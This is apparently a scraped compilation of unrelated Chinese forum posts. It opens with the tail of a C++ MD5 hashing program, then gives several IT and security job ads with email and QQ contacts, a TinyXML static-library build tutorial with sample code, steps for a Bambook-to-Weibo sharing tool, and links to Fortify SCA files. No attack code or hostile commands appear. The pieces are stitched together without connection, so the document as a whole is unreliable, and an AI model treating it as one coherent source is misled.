					hash+=(string)tmp;
		    }
			return hash;
}
int main() {
		string file_name = "/root/install.log";
		cout<<file_md5(file_name)<<endl;
		cout<<string_md5(file_name)<<endl;
		return 0;
}

工作地点：北京

安全工程师：

职位描述：

负责公司产品和业务的安全检测和安全加固，引导开发人员修复安全问题
负责各类安全问题和安全事件的跟踪和分析，支持公司各部门日常安全工作
负责公司定期的安全风险评估和检测
负责安全设备，如防火墙、IDS、VPN等的维护和管理
负责WEB代码检查，WEB漏洞检测
DDoS、DNS劫持等突发网络安全事件的快速处理
突发安全事件的应急响应
跟踪和分析新的安全漏洞、安全技术

职位要求（满足以下一条或者多条均可）：

精通常见Web漏洞类型及原理（具有丰富经验者优先考虑）；
精通常见的WEB漏洞防范方法与安全审计；
精通渗透测试，熟练掌握各种渗透测试工具，精通常见安全攻防技术；
具有一定的编程能力，熟悉至少一种编程语言；
熟悉和处理过常见网络攻击，如DDoS、DNS劫持等突发网络安全事件的快速处理；
熟悉网络协议、交换机、路由器等网络设备的配置管理；
熟悉常见网络安全产品（如FireWall、IDS、Scanner、Audit、IPS、VPN等）的使用；
具有一定的逆向分析能力和经验；
对常见的Web编程语言要有一定的解读能力；
熟悉Linux或Windows操作系统及相关服务和应用的配置管理、安全加固；
熟悉钓鱼攻击和防范；
熟悉各种帐号保护机制，具有相关经验；
熟悉常见的应用程序漏洞、操作系统等漏洞；
跟踪和分析最新安全相关的技术；
具有较强的学习能力、良好的沟通能力、团队合作精神及高度的责任心

安全开发工程师：

职位描述：

负责公司内部安全支撑系统的开发和优化
负责公司网络安全相关的工具的设计与开发
把现有的安全类工作流程信息化，实现自动化操作
负责安全测试示例的编写

职位要求：

两年及以上开发或实习经验，能力突出者不受此限制
熟悉linux系统基本操作以及linux环境下的shell编写
熟悉PHP+MySQL开发，熟悉JavaScript、HTML、CSS，了解WEB基本原理
熟悉多种编程语言者优先，如C,C++,python,perl等
熟悉面向对象编程，具有优良的编程风格和习惯，并会编写各种开发文档
具有强烈的责任心，较强的学习能力
具有良好的合作沟通能力和团队合作精神
熟悉web安全，具有安全开发经验者优先

      1.下载tinyxml库，直接从官方下载，http://sourceforge.net/projects/tinyxml/。

      2.解压缩下载好的包，我解压缩到test目录下,进入项目目录。

      3.使用vim编辑器修改Makefile文件：

•  将其中的OUTPUT := xmltest一行修改为：OUTPUT := libtinyxml.a
• 将xmltest.cpp从SRCS：=tinyxml.cpp tinyxml-parser.cpp xmltest.cpp tinyxmlerror.cpp tinystr.cpp中删除，，注释掉xmltest.o：tinyxml.h tinystr.h。因为不需要将演示程序添加到动态库中。
• 将${LD} -o $@ ${LDFLAGS} ${OBJS} ${LIBS} ${EXTRA_LIBS}修改为：${AR} $@ ${LDFLAGS} ${OBJS} ${LIBS} ${EXTRA_LIBS}。
• 保存退出。

      4.执行make命令编译，即可在当前目录生成libtinyxml.a文件。

      5.调用测试，当前目录新建一个test.cpp文件，内容如下：

#include "tinyxml.h"  
#include "tinystr.h"    
#include <iostream>    
using namespace std;  
   
int main()  
{  
	//创建一个XML的文档对象。  
	TiXmlDocument *myDocument = new TiXmlDocument("test.xml");  
	myDocument->LoadFile();  
      
	//获得根元素，即Persons。  
	TiXmlElement *RootElement = myDocument->RootElement();  
   
	//输出根元素名称，即输出Persons。  
	cout << RootElement->Value() << endl;  
        
	//获得第一个Person节点。  
	TiXmlElement *FirstPerson = RootElement->FirstChildElement();  
	//输出接点名Person  
    
	cout << FirstPerson->Value() << endl;  
	//获得第一个Person的name节点和age节点和ID属性。  
	TiXmlElement *NameElement = FirstPerson->FirstChildElement();  
	TiXmlElement *AgeElement = NameElement->NextSiblingElement();  
	TiXmlAttribute *IDAttribute = FirstPerson->FirstAttribute();  
       
	//输出第一个Person的name内容，即周星星；age内容，即20；ID属性，即1。  
	cout << NameElement->FirstChild()->Value() << endl;  
	cout << AgeElement->FirstChild()->Value() << endl;  
	cout << IDAttribute->Value() << endl;  
   
        return 0;  
}  

创建test.xml文件，内容如下：

<Persons>  
	<Person ID="1">  
		<name>周星星</name>  
		<age>20</age>  
	</Person>  
	<Person ID="2">  
		<name>白晶晶</name>  
		<age>18</age>  
	</Person>  
</Persons>  

编译当前文件，调用libtinyxml.a库：

[root@server tinyxml]# g++ -o test test.cpp ./libtinyxml.a

执行编译好的程序：

[root@server tinyxml]# ./test
Persons
Person
周星星
20
1

将编译好的test和test.xml放至另外一台没有tinyxml的库，执行成功。

以上代码在centos5.4上测试正常。

开发环境：Windows7+VC2010。

使用方法：

1.点击链接至Bambook，会自动读取设备自有书信息。

2.要分享的书上右键，即可弹出分享到新浪微博按钮。

3.修改默认内容，点击发布。

4.第一次发布时，会弹出窗口在新浪网站授权下使用此应用，并输入新浪api返回的PIN码，以后无需再输入。

5.分享成功。

[attach=32][attach=33][attach=34]

公司性质：网游
规模： 100人
工作地点：上海
待遇：根据个人能力而定，本次招聘主要面向中、基层岗位

除BI专员外，其余岗位无学历限制

简历可发送至ay4z3ro@hotmail.com,来信请注明薪资期望

职位：运维工程师
招聘人数：3-4人
职位描述：
1. 负责生产网络、服务器、数据库与支撑系统的建设、运维和监控，保证各业务系统正常运营；
2. 负责突发性事件的快速响应和处理，解决服务器和网络故障；
3. 研究运维相关技术，制定运维技术方案、部署统一化、集中化的运维系统和工具；
4. 负责对现有运维系统的性能改善。

职位要求：
1. 计算机或相关理工科专业专科或以上学历，为人真诚正直；
2. 精通Linux操作系统，熟悉Linux脚本编程；
3. 熟悉Apache、nginx、Mysql等应用的配置与维护；
4. 熟悉防火墙，交换机等网络设备的安装、配置；
5. 2年以上相关工作经验，深入理解Linux系统的和部署，有系统调优经验者优先；
6. 具备良好的沟通能力和强烈的责任心，热爱运维技术，有良好的文字表达能力和自学能力，有良好的团队合作意识。

职位：PHP开发工程师
招聘人数：1-2人
职位描述：
负责如下系统的设计，编码，测试，文档记录，开发优化维护等：
1. passport中心
2. 支付平台
3. 论坛整合插件(discuz!)
4. 在线活动项目
5. 资产管理系统
6. 广告统计系统
7. 服务器监控系统
8. 周边产品的
职位要求：
1. 精通PHP5开发（2年以上工作经验,有WebGame或者社区开发经验优先）
2. 扎实的编程基础。代码构造清晰，易读。擅长代码和算法优化。
3. 熟悉MySql数据库设计，了解Memcached优化。
4. 了解PHP与FLASH（或者其它非浏览器客户端）的常用通信方式。（如AMFPHP）了解HTTP协议。
5. 熟悉javascript,善用ajax等技术，熟悉Jason数据格式。
6. 熟悉各浏览器的安全机制上的差异，能够解决兼容性问题，如：iframe,cookies,ajax。
7. 熟悉PHP（APC之类）缓存技术，对异步机制下的状态维持、更新有一定的了解
8. 熟悉SVN等版本控制开发环境

职位：数据库管理员/DBA
招聘人数：1-2人
职位描述：
1. 负责公司游戏产品、支撑平台的数据库日常维护和监控；
2. 负责数据库的更新和运营相关数据的统计分析。

职位要求：
1. 熟悉MySQL,Oracle的体系结构,复制,高可用,监控和备份机制；
2. 具备较强的数据库故障解决能力；
3. 至少熟悉Shell或Python脚本语言之一；
4. 熟练使用PL/SQL,对大数据量下的数据处理有一定经验，有PL/SQL, SQL调优经验者优先；
5. 熟悉数据仓库的ETL开发和数据建模优先；
6. 能阅读各类英语文档。

职位：BI&UCD专员
招聘人数：1
职位描述：
1. 辅助运营流程建设；
2. 辅助运营数据统计、分析、挖掘；
3. 参与实施BE/UCD管理及团队建设；
4. 数据化衡量运营质量、提供决策参考依据；
职位要求：
1. 本科学历是必须条件，计算机及相关专业优先；
2. 学习能力强，具有较强的沟通与领悟能力；
3. 具备自我驱动能力，抗压能力强，服务意识及团队合作精神佳；

SCA:http://neeao.com/Fortify/sca/

rules-schema:http://neeao.com/Fortify/rules-schema/

1）项目经理一名： 3年以上从业经验，对各类安全标准、安全服务框架熟悉，可以设计体系化安全解决 方案，网络与系统安全方面知识扎实，本科以上学历。具有电力行业安全实施经验者优先，CISP、CISSP 、CCIE优先。
2）VC程序UI设计师一名，要求有美术功底，熟悉VC，C#。
3）网络安全工程师2名：

熟悉windows / linux操作系统，了解补丁分发技术,并能搭建企业的多平台补丁分发平台；
熟悉防火墙、VPN、IDS、IPS等网络安全产品的原理与操作
熟悉JSP、ASP、PHP等脚本语言，对脚本和系统都要有一定程度的解读能力；
熟悉网络与系统的风险评估和安全加固
本科以上学历，CCIE CISP优先
4）渗透工程师
没有硬性要求，有自己发掘漏洞能力就可以

项目经理15-18K
工程师8-15K
渗透人员6-15K

联系方式：
QQ： 9148357
MAIL： crazitor@gmail.com